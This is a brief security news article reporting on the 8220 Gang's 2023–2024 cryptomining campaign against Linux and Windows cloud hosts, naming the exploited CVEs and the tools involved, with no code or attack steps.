Linux & Windows Users Beware: 8220 Gang’s Crypto Assault

Recently, a group of hackers from China, known as the “8220 Gang,” has significantly intensified their assaults on cloud infrastructure, targeting both Linux and Windows users with the aim of illicit cryptocurrency mining.

The latest campaign by this group, spanning from May 2023 to February 2024, marks a significant evolution in the tactics of 8220 and represents an escalated threat to global cloud security.

Downloading payload deliver.cmd

According to a recent report by Uptycs, these cybercriminals have shifted their focus towards exploiting well-known critical vulnerabilities, including CVE-2021-44228 (CVSS 10) and CVE-2022-26134 (CVSS 9.8). The malefactors infiltrate cloud systems by scanning the internet for vulnerable applications and exploiting the aforementioned vulnerabilities for unauthorized access.

Meanwhile, one of the group’s recent attacks aimed to exploit an even older vulnerability in Oracle WebLogic—CVE-2017-3506, allowing the attackers to remotely execute arbitrary commands and pave the way for further malicious activities.

These attacks have a profound impact on numerous organizations reliant on cloud infrastructure for their operations. The shift in tactics and methods used by the 8220 group signifies an alarming advancement in the capabilities of cybercriminals and underscores the need for heightened vigilance and enhanced security measures.

In their campaigns, the group employs various tools, including the malicious software Tsunami, XMRig, Masscan, and Spirit, to conduct unauthorized cryptocurrency mining on compromised Linux and Windows hosts. Such illegal activities pose significant risks to the integrity and performance of the affected systems.

As the 8220 Gang continues to refine its strategies, cybersecurity specialists must remain one step ahead, actively identifying new threats and effectively countering them.

Organizations worldwide must prioritize cloud security and adopt comprehensive protection strategies to safeguard their digital assets against the 8220 group and similar malefactors.